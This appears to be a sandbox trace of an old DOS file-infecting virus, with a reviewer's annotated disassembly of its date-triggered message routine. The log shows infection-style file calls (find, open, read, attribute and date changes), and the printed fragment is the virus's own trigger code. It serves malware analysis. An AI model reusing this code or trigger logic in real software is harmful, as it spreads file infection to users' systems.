2018-12-25T11:46:14.995564502Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.997263483Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:15.006055106Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:15.018508225Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:15.022068704Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:15.030051916Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:15.038323977Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:15.04054424Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:15.047582212Z 59 PC: 12af7 | Change current directory
2018-12-25T11:46:15.052771364Z 59 PC: 12b01 | Change current directory
; Instruction window the sandbox printed after the "Get date" call
; (INT 21h, AH=2Ah: DL=day, DH=month, CX=year). This is the static window that
; follows the call, not necessarily the path executed.
; Payload trigger: the message code runs only when the day of the month is 1 and a
; following "Get time" returns hundredths <= 0x55; either failed test branches to
; 0x12b5c.
; NOTE(review): in this run no Get time at PC 12b0e is logged; the next logged calls
; are Set disk transfer address at PC 12b69 and the host program's own message,
; so the jne at 0x12b08 was presumably taken and no payload text was shown.
; Analysis note: a run on any date other than the 1st looks like plain file
; infection; reaching the message path needs control of the emulated clock.
2018-12-25T11:46:15.062642953Z 42 PC: 12b05 | Get date 0x12b05: cmp dl, 1  ; DL = day of month returned by Get date
0x12b08: jne 0x12b5c  ; not the 1st: skip the message code
0x12b0a: mov ah, 0x2c  ; INT 21h function 2Ch = Get time
0x12b0c: int 0x21  ; returns DL = hundredths of a second
0x12b0e: cmp dl, 0x55  ; 0x55 = 85
0x12b11: jg 0x12b5c  ; skip when hundredths > 85 (signed compare; the value is 0..99)
0x12b13: and dx, 7  ; dx = DL & 7 (also clears DH): 0..7
0x12b16: shl dl, 1  ; times 2: byte offset into a table of words
0x12b18: mov bx, bp
0x12b1a: add bx, dx  ; bx = bp + offset
0x12b1c: mov dx, word ptr [bx + 0x3b4]  ; load one of up to eight word entries at bp+0x3b4
0x12b20: add dx, bp  ; rebase the entry by bp
0x12b22: inc dx  ; step past the entry's first byte (its meaning is not shown in this window)
0x12b23: push dx  ; keep the selected string pointer for the second print
0x12b24: mov ah, 9  ; INT 21h function 09h = Display string
0x12b26: lea dx, word ptr [bp + 0x40c]  ; fixed first string
0x12b2a: int 0x21  ; first Display string call
0x12b2c: pop dx  ; dx = table-selected string
0x12b2d: int 0x21  ; second Display string call
0x12b2f: dec dx  ; back to the byte skipped at 0x12b22
2018-12-25T11:46:15.065028629Z 26 PC: 12b69 | Set disk transfer address
2018-12-25T11:46:15.066112314Z 9 PC: 12a67 | Display string (String= 'This is a tiny COM program. ')